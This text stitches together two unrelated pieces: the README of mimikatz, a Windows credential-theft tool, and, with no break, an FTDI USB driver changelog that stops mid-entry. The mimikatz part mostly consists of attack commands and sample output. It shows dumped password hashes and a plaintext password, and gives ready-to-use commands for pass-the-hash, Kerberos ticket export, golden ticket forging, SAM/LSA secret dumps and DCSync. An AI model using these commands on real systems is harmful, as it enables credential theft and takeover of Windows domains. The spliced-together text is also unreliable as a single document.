mimikatz mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( ) '## v ##' (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki or on (in French, yes). If you don't want to build it, binaries are availables on Quick usage log privilege::debug sekurlsa sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd kerberos kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi crypto crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export vault & lsadump vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local Build mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are: - for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - - for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =) Synchronize! - GIT URL is : - SVN URL is : - ZIP file is : Build the solution - After opening the solution, Build / Build Solution (you can change architecture) - mimikatz is now built and ready to be used! (Win32 / x64) - you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK. ddk2003 With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies) For this optional platform, Windows Driver Kit 7.1 (WinDDK) - and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after. Follow instructions: - - Licence CC BY 4.0 licence - Author - Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] ) - DCSync function in lsadump module was co-writed with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] ) or visit his website ( ) This is a personal development, please respect its philosophy and don't use it for bad things!
FTDI CDM Drivers 2.06.00 - Revision Comments FTDI’s CDM drivers provide both D2XX and VCP functionality through a single driver package on PCs running the following Windows operating systems: • Windows Server 2008 R2 • Windows 7 • Windows 7 x64 • Windows Server 2008 • Windows Server 2008 x64 • Windows Vista • Windows Vista x64 • Windows Server 2003 • Windows Server 2003 x64 • Windows XP • Windows XP x64 • Windows 2000 The files included in a standard CDM release are: • Installation files o FTDIBUS.INF o FTDIPORT.INF • Driver files o FTDIBUS.SYS o FTSER2K.SYS • D2XX Interface o FTD2XX.DLL (32-bit) o FTD2XX.DLL (64-bit) o FTD2XX.LIB (32-bit) o FTD2XX.LIB (64-bit) o FTD2XX.H • Supporting files o FTLang.DLL (32-bit) o FTLang.DLL (64-bit) o FTCSERCO.DLL (32-bit) o FTCSERCO.DLL (64-bit) On making a new release the files will be posted on FTDI’s web site in ZIP file format. Release version 2.06.00 (October 22, 2009) WHQL candidate version with various bug fixes and enhancements. Release Fixes • Corrected buffer optimisation for hi-speed devices. • Fix BSOD when terminating application with full buffers after disconnect. • Prevent data being written to hi-speed chips until baud rate has stabilised. • Fix XOn/XOff issue. • Fix BSOD when connecting an FT232R/FT245R with endpoint size of 0. • Fix possible BSOD when opening hi-speed device with full buffers. • Added ability to alias hi-speed baud rates up to 12Mbaud. • Added more languages to FTLang: o Dutch • Corrected positioning of controls on property page for some display settings. • FTLang will now detect current user interface language rather than Windows system language. Release version 2.04.16 (February 17, 2009) WHQL certified version with various bug fixes and enhancements. Release Fixes • Fix power management issue. • Additional protection in serial driver. Release version 2.04.14 (October 27, 2008) WHQL candidate version with various bug fixes and enhancements. Release Fixes • Added more languages to FTLang: o Finnish • Added support for FT2232H and FT4232H. • Prevent users from programming EEPROMs with VID or PID of 0x0000. • Fixed rare installation problem on Windows Server 2003 x64. • Fixed problem with USB 2.0 hub enumeration. • Fix for DTM rebalance test. • Force endpoint size in FT232R/FT245R EEPROM structure to always be 64. • Added FT_EVENT_LINE_STATUS for use with FT_SetEventNotification. • Fixed LocIds bugs. Release version 2.04.06 (March 13, 2008) WHQL certified version with various bug fixes and enhancements. Release Fixes • Added multilingual support to property page via FTLang.DLL. Supported languages are: o English (Default) o Chinese (Traditional) o French o German o Hungarian o Italian o Japanese o Korean o Polish o Russian o Spanish • Added FT_GetComPortNumber function. • Added Line Status to IOCTL_FT_GET_MODEM_STATUS. • Changes to write request processing to fix blue screen. • Fixed FT_ResetDevice for FT2232. • Fixes for Windows error report crashes. • Fixed synchronisation issue. • Fixed deadlock issues for multi-processor systems. • Fixed error condition state in suspend. • Revised co-installer. • Support for COM port disabled in device manager (as opposed to disabled though property page). • Fixed synchronization issue if COM port installation was incomplete. • Fixed device info list issues: list not populated when using Win32 functions • Now return default info for devices open in other processes. • Fixed lock-up problem in Vista and XP. • Fixed USB 2.0 location ID problem on Windows 2000. Release version 2.02.04 (July 3, 2007) WHQL certified version. New driver architecture combining 32-bit OS driver and 64-bit OS driver. Release Fixes • Code fixes for PreFast and SDV. • Fix write timeouts. • Changed write request processing for DVDO box. • Use LocIds for creating com ports if using IgnoreHWSerNum. • Various fixes for PreFast. • Remove references to 5-6 data bits and 1.5 stop bits. • Fix blue screen in checked build serial driver. • Power management fast resume for Vista. • Fixed LocID problem with usb2.0 hubs on Win2K. • Synchronize D2XX open and serial port startup. • Fixed object name collision problem in VCP. • Fixed WER 0xD1_W_ftdibus!FT_WriteTimeoutProc+2c. Release Version 2.00.00r (May 18, 2006) WHQL certified version. New driver architecture combining functionality of D2XX and VCP drivers. Release Fixes • Removed unused fields from device extension. • Fixed write timeout bytes returned problem. • Changes for power management • Fix for buffer full handshake problem. • Combined driver model. • Added workaround for R-chip bad serial number problem. • Fixed bug in device startup. • Fixed vendor request queuing lockup problem. • Changed device ID creation to fix problem seen in 64-bit OS. • Fixed lockup problem with hardware handshake (3-write problem) by restoring timeouts for OUT requests. • Fixed disconnect after hibernate problem. • Fixed disconnect during open session with active communications problem. Previous Release Revisions 1.00.2176 (December 12, 2005) WHQL certified version. Fixed installation problem. 1.00.2172 (October 31, 2005) Support for FT2232C devices. 1.00.2170 (October 27, 2005) Fixed write request synchronization issue. 1.00.2169 (September 1, 2005) Fixed flow control issues. Changed cancel processing to fix blue screen. 1.00.2168 (June 8, 2005) Fixed lockup condition on port close. 1.00.2166 (May 23, 2005) Fixed bug in software flow control. 1.00.2163 (February 7, 2005) Support for buffered writes. Fixed property page. 1.00.2162 (November 25, 2004) Tested with HCT 12.0. 1.00.2160 (October 26, 2004) Added option to prevent modem control signals following legacy port behaviour at startup. 1.00.2159 (October 15, 2004) Fixed delay on disconnect under WinXP. 1.00.2157 (September 28, 2004) Fixed bug that could cause computer to hang during closedown. 1.00.2156 (September 9, 2004) Fixed bug in baud rate divisor calculation for AM devices. Location Ids supported is no longer restricted to 10 or less. Fixed bug that could cause computer to hang on surprise removal. Fixed bug that caused device handle notification to fail. 1.00.2154 (April 20, 2004) WHQL certified version. Fixed initialization problem on WinXP SP1. Fixed IOCTL_SERIAL_GET_DTRRTS. 1.00.2151 (February 4, 2004) Fixed problem with signalling events on disconnect with open port. 1.00.2150 (January 19, 2004) Fixed problem with signalling line status errors. Fixed problem with Location IDs and external hubs. 1.00.2148 (November 11, 2003) More fixes for WHQL. Fixed problem that prevented RXCHAR event being signalled when buffers were full. 1.00.2146 (October 28, 2003) Various fixes for WHQL. Added option for immediate processing of vendor commands. 1.00.2145 (October 20, 2003) Fixed power-level problem with VCP serializer DLL interface. 1.00.2143 (September 24, 2003)



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